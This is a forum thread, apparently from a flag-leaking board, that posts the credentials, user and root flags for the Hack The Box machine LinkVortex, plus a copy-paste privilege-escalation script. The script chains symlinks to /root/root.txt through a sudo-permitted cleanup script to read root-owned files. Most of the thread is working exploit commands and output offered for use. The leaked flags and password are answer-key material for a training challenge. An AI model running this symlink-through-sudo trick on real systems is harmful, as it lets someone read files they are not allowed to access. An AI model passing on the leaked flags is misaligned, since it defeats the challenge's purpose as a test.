HTB LinkVortex - Flags
by mhsoraa - Saturday December 7, 2024 at 09:13 PM
#1
User:
kali$ ssh bob@linkvortex.htb
bob@linkvortex.htb's password: fibber-talented-worth
bob@linkvortex:~$ ls
user.txt
bob@linkvortex:~$ cat user.txt
6e6acfb2b564ecec3c71c2963bb3cf85
bob@linkvortex:~$

Root:
bob@linkvortex:~$ ln -s /root/root.txt /home/bob/pwn.txt
bob@linkvortex:~$ ln -s /home/bob/pwn.txt /home/bob/pwn.png
bob@linkvortex:~$ sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/pwn.png
Link found [ /home/bob/pwn.png ] , moving it to quarantine
Content:
911be11ee404e95c2e1f273ed2039179
bob@linkvortex:~$
Reply
#2
login
ssh bob@linkvortex.htb:fibber-talented-worth

paste this code and execute
#!/bin/bash

ln -s /root/root.txt /home/bob/pwn.txt
ln -s /home/bob/pwn.txt /home/bob/pwn.png
sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/pwn.png | echo  | tail -1
Reply
#3
I think is better to share the write-up with no passwords so people can learn, even if is a easybox if not people will never out grow  the copy/paste level. :catglasses:
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] CPTS 12 FLAGS pulsebreaker 59 1,150 03-28-2026, 06:26 PM
Last Post: vilas033
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 360 88,710 03-28-2026, 09:28 AM
Last Post: catsweet
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 16 2,276 03-28-2026, 03:32 AM
Last Post: lulaladrow
  [FREE] HTB-ProLabs APTLABS Just Flags kewlsunny 23 2,348 03-28-2026, 03:30 AM
Last Post: lulaladrow
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 87 7,490 03-27-2026, 07:22 PM
Last Post: stn



 Users browsing this thread: 1 Guest(s)